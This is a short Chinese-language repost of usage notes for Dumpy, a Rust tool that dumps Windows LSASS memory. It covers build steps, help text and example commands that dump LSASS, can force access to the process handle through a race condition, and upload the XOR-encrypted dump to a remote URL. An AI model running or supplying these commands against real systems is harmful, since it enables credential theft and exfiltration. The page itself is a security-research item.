Rust cargo
C:UsersUserDesktop> git clone https://github.com/Kudaes/Dumpy.git
C:UsersUserDesktopDumpydumpy> cargo build --release
C:UsersUserDesktopDumpydumpytargetx86_64-pc-windows-msvcrelease> dumpy.exe -h
Usage: dumpy.exe --dump|--decrypt [options]
Options:
-h, --help 打印工具帮助信息你
--dump 转储Lsass数据
--decrypt 解密之前生成的转储文件
-f, --force 通过竞争条件强制服务暴露lsass句柄、
-k, --key 加密密钥 [默认: 1234abcd]
-i, --input 加密转储文件 [默认: c:tempinput.txt]
-o, --output 目的路径 [默认: c:tempoutput.txt]
-u, --upload 上传URL
dump命令
C:Temp> dumpy.exe --dump -k secretKey -u http://remotehost/upload
C:Temp> dumpy.exe --dump -k secretKey -u http://remotehost/upload --force
decrypt命令
C:Temp> dumpy.exe --decrypt -i xored.txt -o decrypted.txt -k secretKey
原文始发于微信公众号(FreeBuf):Dumpy:一款针对LSASS数据的动态内存取证工具
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论